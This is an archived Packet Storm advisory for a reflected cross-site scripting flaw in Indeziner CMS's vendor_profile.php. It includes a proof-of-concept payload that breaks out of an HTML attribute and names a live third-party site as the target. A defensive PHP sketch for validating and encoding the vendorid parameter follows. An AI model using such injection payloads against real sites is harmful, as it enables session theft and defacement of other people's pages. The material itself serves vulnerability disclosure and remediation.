Indeziner CMS Cross Site Scripting

2014-04-19T00:00:00
ID PACKETSTORM:126240
Type packetstorm
Reporter Renzi
Modified 2014-04-19T00:00:00

Description

`# Cross Site Scripting on INDEZINER CMS  
# Risk: Low  
# CWE number: CWE-79  
# Date: 19/04/2014  
# Vendor: indeziner.com  
# Author: Felipe Gabriel Renzi  
# Contact: renzi@linuxmail.org  
# Tested on Windows 8 pro  
# Vulnerable File: vendor_profile.php  
# Exploit: http://host/vendor_profile.php?vendorid=[xss]  
# PoC:   
- Target: http://excitefind.com  
- Vuln. File: /vendor_profile.php?vendorid=  
- Exploit: "><marquee>Vulnerable</marquee>  
`
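
A mitigation sketch for the reflected `vendorid` parameter described above, added here as an example and not taken from the Indeziner code base. The advisory names only `vendor_profile.php` and `vendorid`, so the numeric-ID assumption, the function names and the markup are hypothetical (requires PHP 8.0 or later).

```php
<?php
// Added example: hardening a handler like vendor_profile.php against the
// reflected XSS in the advisory. The real Indeziner source is not on the page;
// function names, the numeric-ID assumption and the markup are hypothetical.

declare(strict_types=1);

/**
 * Validate vendorid at the trust boundary.
 * Assumption: vendor IDs are positive integers. Returns null on anything else.
 */
function parse_vendor_id(mixed $raw): ?int
{
    // Arrays (vendorid[]=x) and missing values are rejected outright.
    if (!is_string($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Encode for HTML text and quoted-attribute contexts. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_vendor_link(int $vendorId, string $vendorName): string
{
    // Attribute values are always quoted and encoded, so a `">` sequence
    // cannot close the attribute and open a new tag.
    return sprintf(
        '<a href="vendor_profile.php?vendorid=%d" title="%s">%s</a>',
        $vendorId,
        h($vendorName),
        h($vendorName)
    );
}

// Constructed inputs: a normal ID and the advisory's marker string.
foreach (['42', '"><marquee>Vulnerable</marquee>'] as $raw) {
    $id = parse_vendor_id($raw);
    if ($id === null) {
        // Never echo the rejected value raw; encode it if it must be shown.
        echo 'rejected: ', h($raw), PHP_EOL;
        continue;
    }
    echo render_vendor_link($id, 'Acme "Tools" <Ltd>'), PHP_EOL;
}
```

Validation narrows what the parameter can contain, and context-aware output encoding is what stops the break-out from a quoted attribute, so both belong in the fix.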